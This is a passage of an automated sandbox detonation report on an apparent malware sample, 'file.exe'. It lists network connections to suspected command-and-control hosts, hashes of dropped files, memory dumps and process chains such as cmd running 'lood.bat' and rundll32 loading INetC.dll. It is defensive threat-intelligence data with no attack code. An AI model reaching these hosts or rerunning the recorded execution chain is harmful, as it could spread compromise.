DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.76:80 185.172.128.76 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
NL 108.156.61.13:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 monoblocked.com udp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 svc.iolo.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.246:80 download.iolo.net tcp
US 8.8.8.8:53 c.574859385.xyz udp
GB 37.221.125.202:443 c.574859385.xyz tcp
GB 37.221.125.202:443 c.574859385.xyz tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:15647 tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:9000 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nsy17E5.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar1B57.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b202a217393a8838a3f2a16429fc0c85
SHA1 da2e5395c24028495bafe351a87451ead55261a3
SHA256 95dba006f6ba4d9cf793882ff1b6a3501287223dea2128b80dc798955546c23c
SHA512 b2ffc88e15e6e9f9a85b77605bb92a5b8202725765f007e4a77b0bf805149555ca2813d70f32a94a9fc3fc2729e5aa7feebd4c7a6921d1d221cbcb7df83b7fac

C:\Users\Admin\AppData\Local\Temp\nsy17E5.tmp\lood.bat

MD5 b3370db0fabeb3a7d6a9221f5b03d984
SHA1 1834ce744a9498810c1964144662f3260a3cb3f8
SHA256 a222779606d0ced41e7466aa8ac266b9774f96e4f46ddf349d4ce4fa5e0a1cb1
SHA512 fd3d42ddec767a846158dfebed8a887367194b2eb994db251b1dcd4a4463616a2a08e98b0d3712d0acf017242270129468d52c0496103fff44ee3b3ea1e08bef

memory/1480-151-0x0000000002140000-0x0000000002180000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 57632797fb4b6c8c4fd8b1d10f1f82f5
SHA1 6e85d9231300d1eb1919c753859828e87e86a4b6
SHA256 88c72054c501a3d526910c5470d4e377cbbdef2d45e36800b2028b3eaa9b68b6
SHA512 f88663d57d38a4f06232b6d1bc52a4f4406025ad5936b04ef1076f36c0ee4c412aa172055814ab1259e650102c8fe87a9c68ae4c27f604ad6ec70d4d5cc1cb67

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 22b610eedbb3591f31508e1912ed5b01
SHA1 c2c4d4e5096927c3566f168bcf245b4a9368dbb9
SHA256 82bff5c441390a63ee744341ef0c2a0a7a02b4ae371c4edf19274cfc1fab626f
SHA512 d0e65ca7be82d766329688aa6faa54ac0f0ee1f17de5578754cd0412515f5fa989f04d764011b9fba72b0e036b517a0f6726e01c4a17d068822d7022e5c396db

\Users\Admin\AppData\Local\Temp\uf4.0.exe

MD5 be531dfdb40e97826d86e1fb73fa73c8
SHA1 12f16e6983d1c911b7ed1a485cdbe706c48d78ed
SHA256 d42d82224b04de2afe5659a7fc3ee03ba255a76f58445d10fc14093b1565b24c
SHA512 7ce943e84f69cc19bc0dca2597f74f6ed464e4b2b6935d1e63be854f5947530089045a60cf0578ac8c2df58e9e50c2bd69ce3a707090f9bb09394e01c5ae614b

memory/2100-197-0x0000000000400000-0x000000000403B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UF41~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\uf4.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\uf4.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\uf4.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\uf4.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/2044-287-0x0000000073CD0000-0x0000000073E44000-memory.dmp

memory/2044-288-0x0000000077440000-0x00000000775E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uf4.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

\Users\Admin\AppData\Local\Temp\uf4.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/544-316-0x0000000000400000-0x000000000405E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6094c96911074fc4b5dbc704b5826933
SHA1 49f0439425467e93c78db29e52678a7f56b768fd
SHA256 13b93dbe7d03ed04888bfb3d8d2649cdc86a582b0933a8a7b8473e5de1a16b56
SHA512 52724a1cda8fa0aa0e64a6c24a038b00c901069dd2fb310e660cf4ab02a03071cee595a616df9e5865d3197e2492171e4cf83b942babc502bd4be43b2561642c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c95826ff288e1369630a6801114cc49
SHA1 59f70686d6b66480678b7a2e8e01a4b9b4bc453b
SHA256 634c8c718eca6e950ae8f94eb7a40baff18121912760d29fda9c35dba73512d4
SHA512 efa6603135b5a7aa399f7d976ea8d15071b43dde92b77eb491ac55e7f4592cca4902c95c149cfed518d487df6063d538302d9f0052615bd944c8c0359c043e12

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 55ccc4287ded083ceee66eae3b5fa61e
SHA1 ccb6ad745481d958ae3a3344010e19978a33c9e4
SHA256 ee60a4eb71772a226c455cb14de3d24ae20358d2ea7ab0f6995315b58d35aacc
SHA512 cd6e8b6cc3ec7dda4ab9f707499f6c55884550c498b336ed36edd7a62b82a2649adc04fcf35b36c5ef4452a393afbac399c2bf6908521144f8fb3c3c0bdf41ea

memory/2044-417-0x0000000073CD0000-0x0000000073E44000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e4e50f70

MD5 01db271a21331e88700f36f722d6b751
SHA1 87891d0d13d05abd95322d80e2326277281d5285
SHA256 aa1d4769e8ad004331f90fc34263961fcfb2488dca2504f853f78c58c6b43dc8
SHA512 da202ea5988160c51907a5e3a0c255ee0c109b320fabbaae6c0d264acb95b2222252923e62ef3ee8f1e7725818b027578494e4ef299db9077c7a7f9dd5d04f16

memory/2500-434-0x0000000077440000-0x00000000775E9000-memory.dmp

memory/2436-482-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1800-483-0x0000000000E60000-0x0000000004758000-memory.dmp

memory/1800-484-0x000000001EED0000-0x000000001EFE0000-memory.dmp

memory/1800-486-0x0000000000300000-0x000000000030C000-memory.dmp

memory/1800-485-0x0000000000270000-0x0000000000280000-memory.dmp

memory/1800-487-0x00000000002F0000-0x0000000000304000-memory.dmp

memory/1800-488-0x0000000000C50000-0x0000000000C74000-memory.dmp

memory/1800-489-0x0000000000B90000-0x0000000000B9A000-memory.dmp

memory/1800-490-0x000000001EB50000-0x000000001EB7A000-memory.dmp

memory/1800-491-0x000000001ED20000-0x000000001EDD2000-memory.dmp

memory/1800-492-0x000000001EB80000-0x000000001EBFA000-memory.dmp

memory/1800-493-0x0000000000E00000-0x0000000000E62000-memory.dmp

memory/1800-494-0x0000000000290000-0x000000000029A000-memory.dmp

memory/1800-498-0x000000001FF00000-0x0000000020200000-memory.dmp

memory/1800-501-0x00000000002C0000-0x00000000002CA000-memory.dmp

memory/1800-500-0x00000000002C0000-0x00000000002CA000-memory.dmp

memory/1800-502-0x00000000005B0000-0x00000000005BA000-memory.dmp

memory/1800-503-0x0000000000C20000-0x0000000000C42000-memory.dmp

memory/1800-506-0x0000000000C40000-0x0000000000C4C000-memory.dmp

memory/1800-510-0x00000000002C0000-0x00000000002CA000-memory.dmp

memory/2500-511-0x0000000073CD0000-0x0000000073E44000-memory.dmp

memory/2608-515-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2608-514-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2608-513-0x0000000072A70000-0x0000000073AD2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\f40fa09571ae3e4604ca1ef5093c12d04345052412cd199086553bfab6d3b7c7\c490bee001294b69a0a3075ed4e8271e.tmp

MD5 302dd16ce207ba5194ff8a81a8bbc946
SHA1 971f0c53907890e96584691c919c94f670c8aac9
SHA256 76b6194a6482178fd39d91163cd9bc7d6f4c4fa4f1c9f76e2e0db4fb96f90fb7
SHA512 17305977f943e033cf8d4e838225548feae3f5b26909245851bed51b48b4d4dae81c0e50d6bba3f9805b21f202c4d65826336409cd43816a4ac37b1edf4826a3

memory/2608-521-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpDD37.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-26 15:11

Reported

2024-04-26 15:14

Platform

win10v2004-20240419-en

Max time kernel

66s

Max time network

54s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2544 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2544 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsd35D6.tmp\lood.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp

Files

C:\Users\Admin\AppData\Local\Temp\nsd35D6.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-26 15:11

Reported

2024-04-26 15:14

Platform

win7-20231129-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-26 15:11

Reported

2024-04-26 15:14

Platform

win10v2004-20240419-en

Max time kernel

66s

Max time network

48s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4248 wrote to memory of 224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4248 wrote to memory of 224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4248 wrote to memory of 224 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 224 -ip 224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 g.bing.com udp

Files

N/A